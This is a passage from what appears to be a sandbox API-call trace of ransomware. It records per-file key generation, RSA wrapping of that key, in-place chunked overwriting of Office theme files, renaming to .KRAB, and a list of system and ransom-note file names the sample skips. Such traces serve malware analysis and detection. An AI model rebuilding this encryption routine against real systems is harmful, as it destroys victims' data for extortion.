hProv=0xfbbcc0, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0067.663] CryptReleaseContext (hProv=0xfbbcc0, dwFlags=0x0) returned 1 [0067.663] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.664] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbb5d8) returned 1 [0067.664] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0067.665] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0067.665] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0067.665] CryptGenRandom (in: hProv=0xfbb5d8, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0067.665] CryptReleaseContext (hProv=0xfbb5d8, dwFlags=0x0) returned 1 [0067.665] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.665] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbc078) returned 1 [0067.666] CryptImportKey (in: hProv=0xfbc078, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbdce0) returned 1 [0067.666] CryptGetKeyParam (in: hKey=0xfbdce0, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0067.666] CryptEncrypt (in: hKey=0xfbdce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0067.666] GetLastError () returned 0x0 [0067.666] CryptDestroyKey (hKey=0xfbdce0) returned 1 [0067.666] CryptReleaseContext (hProv=0xfbc078, dwFlags=0x0) returned 1 [0067.666] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbb880) returned 1 [0067.667] CryptImportKey (in: hProv=0xfbb880, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbdce0) returned 1 [0067.679] CryptGetKeyParam (in: hKey=0xfbdce0, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0067.679] CryptEncrypt (in: hKey=0xfbdce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0067.679] GetLastError () returned 0x0 [0067.679] CryptDestroyKey (hKey=0xfbdce0) returned 1 [0067.679] CryptReleaseContext (hProv=0xfbb880, dwFlags=0x0) returned 1 [0067.680] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033927[[fn=Main Event]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033927[[fn=main event]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0067.680] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0067.680] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0067.681] ReadFile (in: hFile=0x440, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x100000, lpOverlapped=0x0) returned 1 [0067.819] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.819] WriteFile (in: hFile=0x440, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x100000, lpOverlapped=0x0) returned 1 [0067.821] ReadFile (in: hFile=0x440, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x100000, lpOverlapped=0x0) returned 1 [0067.844] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.844] WriteFile (in: hFile=0x440, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x100000, lpOverlapped=0x0) returned 1 [0067.846] ReadFile (in: hFile=0x440, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0xc9ecd, lpOverlapped=0x0) returned 1 [0067.857] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0xfff36133, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.857] WriteFile (in: hFile=0x440, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0xc9ecd, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0xc9ecd, lpOverlapped=0x0) returned 1 [0067.861] WriteFile (in: hFile=0x440, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0067.862] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.865] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.869] CloseHandle (hObject=0x440) returned 1 [0068.042] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.050] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033927[[fn=Main Event]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033927[[fn=main event]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033927[[fn=Main Event]].thmx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033927[[fn=main event]].thmx.krab")) returned 1 [0068.051] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.051] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0068.051] lstrcmpW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2=".") returned 1 [0068.051] lstrcmpW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="..") returned 1 [0068.051] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM04033929[[fn=Slate]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033929[[fn=Slate]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033929[[fn=Slate]].thmx" [0068.051] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0068.051] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033929[[fn=Slate]].thmx.KRAB") returned 134 [0068.052] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033929[[fn=Slate]].thmx") returned 129 [0068.052] lstrlenW (lpString=".thmx") returned 5 [0068.052] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0068.052] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".thmx ") returned 6 [0068.052] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.052] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033929[[fn=Slate]].thmx") returned 129 [0068.052] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033929[[fn=Slate]].thmx") returned 129 [0068.054] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="desktop.ini") returned 1 [0068.054] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="autorun.inf") returned 1 [0068.054] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="ntuser.dat") returned 1 [0068.054] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="iconcache.db") returned 1 [0068.055] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="bootsect.bak") returned 1 [0068.055] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="boot.ini") returned 1 [0068.055] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="ntuser.dat.log") returned 1 [0068.055] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="thumbs.db") returned 1 [0068.055] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0068.055] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0068.055] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0068.055] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="ntldr") returned 1 [0068.055] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="NTDETECT.COM") returned 1 [0068.055] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="Bootfont.bin") returned 1 [0068.055] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0068.057] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbc078) returned 1 [0068.057] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0068.059] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0068.059] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0068.122] CryptGenRandom (in: hProv=0xfbc078, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0068.122] CryptReleaseContext (hProv=0xfbc078, dwFlags=0x0) returned 1 [0068.122] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.531] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbb198) returned 1 [0068.531] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0068.532] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0068.532] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0068.532] CryptGenRandom (in: hProv=0xfbb198, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0068.532] CryptReleaseContext (hProv=0xfbb198, dwFlags=0x0) returned 1 [0068.532] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.533] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbb770) returned 1 [0068.533] CryptImportKey (in: hProv=0xfbb770, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbd1e0) returned 1 [0068.533] CryptGetKeyParam (in: hKey=0xfbd1e0, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0068.533] CryptEncrypt (in: hKey=0xfbd1e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0068.534] GetLastError () returned 0x0 [0068.534] CryptDestroyKey (hKey=0xfbd1e0) returned 1 [0068.534] CryptReleaseContext (hProv=0xfbb770, dwFlags=0x0) returned 1 [0068.534] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbb5d8) returned 1 [0068.545] CryptImportKey (in: hProv=0xfbb5d8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbd320) returned 1 [0068.545] CryptGetKeyParam (in: hKey=0xfbd320, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0068.545] CryptEncrypt (in: hKey=0xfbd320, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0068.545] GetLastError () returned 0x0 [0068.545] CryptDestroyKey (hKey=0xfbd320) returned 1 [0068.545] CryptReleaseContext (hProv=0xfbb5d8, dwFlags=0x0) returned 1 [0068.546] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033929[[fn=Slate]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033929[[fn=slate]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0068.546] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0068.547] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0068.548] ReadFile (in: hFile=0x484, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x100000, lpOverlapped=0x0) returned 1 [0068.638] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.638] WriteFile (in: hFile=0x484, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x100000, lpOverlapped=0x0) returned 1 [0068.640] ReadFile (in: hFile=0x484, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x100000, lpOverlapped=0x0) returned 1 [0068.677] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.701] WriteFile (in: hFile=0x484, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x100000, lpOverlapped=0x0) returned 1 [0068.704] ReadFile (in: hFile=0x484, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x3f73b, lpOverlapped=0x0) returned 1 [0068.712] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xfffc08c5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.712] WriteFile (in: hFile=0x484, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x3f73b, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x3f73b, lpOverlapped=0x0) returned 1 [0068.712] WriteFile (in: hFile=0x484, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0068.713] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.737] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.748] CloseHandle (hObject=0x484) returned 1 [0068.847] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.847] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033929[[fn=Slate]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033929[[fn=slate]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033929[[fn=Slate]].thmx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033929[[fn=slate]].thmx.krab")) returned 1 [0068.853] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.853] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0068.853] lstrcmpW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2=".") returned 1 [0068.853] lstrcmpW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="..") returned 1 [0068.853] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM04033937[[fn=Vapor Trail]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033937[[fn=Vapor Trail]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033937[[fn=Vapor Trail]].thmx" [0068.853] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0068.854] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033937[[fn=Vapor Trail]].thmx.KRAB") returned 140 [0068.854] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033937[[fn=Vapor Trail]].thmx") returned 135 [0068.854] lstrlenW (lpString=".thmx") returned 5 [0068.854] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0068.854] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".thmx ") returned 6 [0068.854] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.855] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033937[[fn=Vapor Trail]].thmx") returned 135 [0068.855] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033937[[fn=Vapor Trail]].thmx") returned 135 [0068.855] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="desktop.ini") returned 1 [0068.855] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="autorun.inf") returned 1 [0068.855] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="ntuser.dat") returned 1 [0068.855] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="iconcache.db") returned 1 [0068.855] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="bootsect.bak") returned 1 [0068.855] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="boot.ini") returned 1 [0068.855] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="ntuser.dat.log") returned 1 [0068.855] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="thumbs.db") returned 1 [0068.855] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0068.855] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0068.855] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0068.855] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="ntldr") returned 1 [0068.855] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="NTDETECT.COM") returned 1 [0068.855] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="Bootfont.bin") returned 1 [0068.855] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0068.856] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbbcc0) returned 1 [0068.856] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0068.856] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0069.079] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0069.088] CryptGenRandom (in: hProv=0xfbbcc0, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0069.088] CryptReleaseContext (hProv=0xfbbcc0, dwFlags=0x0) returned 1 [0069.088] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.243] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbc078) returned 1 [0069.243] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0069.244] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0069.247] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0069.247] CryptGenRandom (in: hProv=0xfbc078, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0069.247] CryptReleaseContext (hProv=0xfbc078, dwFlags=0x0) returned 1 [0069.247] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.248] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbb770) returned 1 [0069.249] CryptImportKey (in: hProv=0xfbb770, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbd3a0) returned 1 [0069.249] CryptGetKeyParam (in: hKey=0xfbd3a0, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0069.249] CryptEncrypt (in: hKey=0xfbd3a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0069.249] GetLastError () returned 0x0 [0069.249] CryptDestroyKey (hKey=0xfbd3a0) returned 1 [0069.249] CryptReleaseContext (hProv=0xfbb770, dwFlags=0x0) returned 1 [0069.249] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbb2a8) returned 1 [0069.250] CryptImportKey (in: hProv=0xfbb2a8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbd1e0) returned 1 [0069.250] CryptGetKeyParam (in: hKey=0xfbd1e0, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0069.250] CryptEncrypt (in: hKey=0xfbd1e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0069.250] GetLastError () returned 0x0 [0069.250] CryptDestroyKey (hKey=0xfbd1e0) returned 1 [0069.250] CryptReleaseContext (hProv=0xfbb2a8, dwFlags=0x0) returned 1 [0069.250] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033937[[fn=Vapor Trail]].thmx" (normalized: 